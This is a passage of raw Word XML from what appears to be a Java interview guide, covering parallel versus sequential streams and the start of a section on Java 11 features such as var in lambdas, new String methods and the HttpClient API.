            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="59BEBA3D"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arge datasets, independent tasks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E4B8C" w:rsidRPr="00CE4B95" w14:paraId="59C3F75F" w14:textId="77777777" w:rsidTr="006E4B8C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="42A7B7F9"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PI Method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3749A2AD"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eam()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1EF28ACF"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arallelStream()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6C7863D4" w14:textId="77777777" w:rsidR="006E4B8C" w:rsidRPr="00CE4B95" w:rsidRDefault="006E4B8C" w:rsidP="006E4B8C">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en to Use Parallel Stream?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="619AA6A3"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Use it when:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AFDA327" w14:textId="77777777" w:rsidR="00D54629" w:rsidRPr="00CE4B95" w:rsidRDefault="006E4B8C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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ata set is large</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE8A24E" w14:textId="77777777" w:rsidR="00D54629" w:rsidRPr="00CE4B95" w:rsidRDefault="006E4B8C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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perations are stateless, non-blocking, and independent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD2D831" w14:textId="5E14B174" w:rsidR="006E4B8C" w:rsidRPr="00CE4B95" w:rsidRDefault="006E4B8C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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want to utilize multi-core CPU</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02BC865A" w14:textId="77777777" w:rsidR="006E4B8C" w:rsidRPr="00CE4B95" w:rsidRDefault="006E4B8C" w:rsidP="006E4B8C">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Avoid if:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7D6AD6" w14:textId="77777777" w:rsidR="00D54629" w:rsidRPr="00CE4B95" w:rsidRDefault="006E4B8C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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ask involves shared mutable state</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EAE4803" w14:textId="77777777" w:rsidR="00D54629" w:rsidRPr="00CE4B95" w:rsidRDefault="006E4B8C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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sult depends on processing order</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3929334E" w14:textId="5327F351" w:rsidR="006E4B8C" w:rsidRPr="00CE4B95" w:rsidRDefault="006E4B8C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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makes the program slower due to context switching or I/O delays</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA20316" w14:textId="77777777" w:rsidR="006E4B8C" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="006E4B8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7CABBD8">
          <v:rect id="_x0000_i1777" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E5D5555" w14:textId="18ADE86C" w:rsidR="006E4B8C" w:rsidRPr="00CE4B95" w:rsidRDefault="006E4B8C" w:rsidP="006E4B8C">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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Preserve Order in Parallel Stream</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D9F7EEA" w14:textId="77777777" w:rsidR="006E4B8C" w:rsidRPr="00CE4B95" w:rsidRDefault="006E4B8C" w:rsidP="006E4B8C">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you still want parallelism with order, use .forEachOrdered():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28518C8E" w14:textId="77777777" w:rsidR="006D2FE7" w:rsidRPr="00CE4B95" w:rsidRDefault="006D2F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483635"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>numbe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arallelStream</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="577E73C3" w14:textId="27659534" w:rsidR="006D2FE7" w:rsidRPr="00CE4B95" w:rsidRDefault="006D2F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4836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orEachOrdered</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Keeps order but reduces performance gain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ACE9B87" w14:textId="531BE2C0" w:rsidR="00032852" w:rsidRPr="00CE4B95" w:rsidRDefault="0000000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B2B31A2">
          <v:rect id="_x0000_i1778" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
      <w:r w:rsidR="00032852" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="33314C48" w14:textId="7097B26C" w:rsidR="00E90957" w:rsidRPr="00CE4B95" w:rsidRDefault="00032852" w:rsidP="00032852">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7030A0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="249" w:name="_Toc196307729"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7030A0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Java 11 Features</w:t>
      </w:r>
      <w:bookmarkEnd w:id="249"/>
    </w:p>
    <w:p w14:paraId="674F82AC" w14:textId="77777777" w:rsidR="00370A89" w:rsidRPr="00CE4B95" w:rsidRDefault="00370A89" w:rsidP="00370A89">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="228C84A2" w14:textId="0BBAE2B0" w:rsidR="00370A89" w:rsidRPr="00CE4B95" w:rsidRDefault="00370A89">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="250" w:name="_Toc196307730"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain Java 11 features?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="250"/>
    </w:p>
    <w:p w14:paraId="03C8FE5E" w14:textId="7811FE84" w:rsidR="00370A89" w:rsidRPr="00CE4B95" w:rsidRDefault="00370A89">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DA87C99" w14:textId="77777777" w:rsidR="0011489C" w:rsidRPr="00CE4B95" w:rsidRDefault="0011489C" w:rsidP="00FB476A">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Java 11 Features Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C0CA48"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Java 11 (released in September 2018) is a Long-Term Support (LTS) version after Java 8 and introduced several important features and changes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="061CF7B0" w14:textId="77777777" w:rsidR="0011489C" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00FB476A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:pict w14:anchorId="21CDD1E1">
          <v:rect id="_x0000_i1779" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2056D203" w14:textId="77777777" w:rsidR="0011489C" w:rsidRPr="00CE4B95" w:rsidRDefault="0011489C" w:rsidP="00FB476A">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1.</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Local-Variable Syntax for Lambda Parameters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC383F9"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You can now use var in lambda expressions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F6E0575" w14:textId="79A1DE47" w:rsidR="00680A5C" w:rsidRPr="00CE4B95" w:rsidRDefault="00680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0619130"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
      </w:pP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var</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> a</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var</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> b</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gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> a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b</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="568770A6" w14:textId="77777777" w:rsidR="0011489C" w:rsidRPr="00CE4B95" w:rsidRDefault="0011489C" w:rsidP="00FB476A">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Benefit: Useful when you want to add annotations to parameters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F96384" w14:textId="77777777" w:rsidR="0011489C" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00FB476A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:pict w14:anchorId="6FF9622D">
          <v:rect id="_x0000_i1780" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6B7A99" w14:textId="77777777" w:rsidR="0011489C" w:rsidRPr="00CE4B95" w:rsidRDefault="0011489C" w:rsidP="00FB476A">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2.</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> New String Methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C4B0989"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Java 11 added several new utility methods to the String cla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6"/>
        <w:gridCol w:w="5792"/>
      </w:tblGrid>
      <w:tr w:rsidR="0011489C" w:rsidRPr="00CE4B95" w14:paraId="4852AFCC" w14:textId="77777777" w:rsidTr="0011489C">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="75B9B152" w14:textId="77777777" w:rsidR="0011489C" w:rsidRPr="00CE4B95" w:rsidRDefault="0011489C" w:rsidP="00FB476A">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6FD48DD9" w14:textId="77777777" w:rsidR="0011489C" w:rsidRPr="00CE4B95" w:rsidRDefault="0011489C" w:rsidP="00FB476A">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0011489C" w:rsidRPr="00CE4B95" w14:paraId="6D4FDD23" w14:textId="77777777" w:rsidTr="0011489C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="272F0997"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isBlank()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="528FAF96"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Checks if the string is empty or whitespace only</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0011489C" w:rsidRPr="00CE4B95" w14:paraId="4C014C6D" w14:textId="77777777" w:rsidTr="0011489C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2BE38B24"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lines()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="535DAEA2"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Converts a multiline string into a stream of lines</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0011489C" w:rsidRPr="00CE4B95" w14:paraId="59FA4947" w14:textId="77777777" w:rsidTr="0011489C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="68DDC7B0"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strip()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1F429FD4"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Removes leading and trailing white space (Unicode-aware)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0011489C" w:rsidRPr="00CE4B95" w14:paraId="663E7A71" w14:textId="77777777" w:rsidTr="0011489C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="71DA0AA6"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stripLeading()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="54D764AF"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Removes leading whitespaces</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0011489C" w:rsidRPr="00CE4B95" w14:paraId="1045A42D" w14:textId="77777777" w:rsidTr="0011489C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="05EC3E56"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stripTrailing()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="53201154"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Removes trailing whitespaces</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0011489C" w:rsidRPr="00CE4B95" w14:paraId="2C99E8D5" w14:textId="77777777" w:rsidTr="0011489C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5AB811F6"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repeat(int)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6295EC5F"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Repeats the string multiple times</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7DF8F0D4" w14:textId="77777777" w:rsidR="00DF3C30" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF3C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4959643"/>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t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Java "</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="523BDD8A" w14:textId="77777777" w:rsidR="00DF3C30" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF3C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4959643"/>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Blan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false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DAEDFF5" w14:textId="77777777" w:rsidR="00DF3C30" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF3C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4959643"/>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nB\n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ine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u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3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D29844" w14:textId="77777777" w:rsidR="00DF3C30" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF3C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4959643"/>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i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Java"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB38104" w14:textId="4DF00671" w:rsidR="00DF3C30" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF3C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4959643"/>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ello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pea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Hello Hello Hello</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="586B4A60" w14:textId="77777777" w:rsidR="0011489C" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00FB476A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:pict w14:anchorId="4D385674">
          <v:rect id="_x0000_i1781" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2711193F" w14:textId="77777777" w:rsidR="0011489C" w:rsidRPr="00CE4B95" w:rsidRDefault="0011489C" w:rsidP="00FB476A">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3.</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HTTP Client (Standardized)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56024D98"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The new HTTP Client API introduced in Java 9 is now standard.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="231C9252" w14:textId="77777777" w:rsidR="003461DC" w:rsidRPr="00CE4B95"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035491"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>HttpClient</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> clie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ttpClie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ewHttpClient</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A26185A" w14:textId="77777777" w:rsidR="003461DC" w:rsidRPr="00CE4B95"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035491"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>HttpRequest</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> reques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ttpReque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ewBuilder</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4280EFE4" w14:textId="77777777" w:rsidR="003461DC" w:rsidRPr="00CE4B95"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03549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r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R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reat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ttps://example.com"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="677FC455" w14:textId="77777777" w:rsidR="003461DC" w:rsidRPr="00CE4B95"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03549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uild</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9BEE29" w14:textId="77777777" w:rsidR="003461DC" w:rsidRPr="00CE4B95"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035491"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
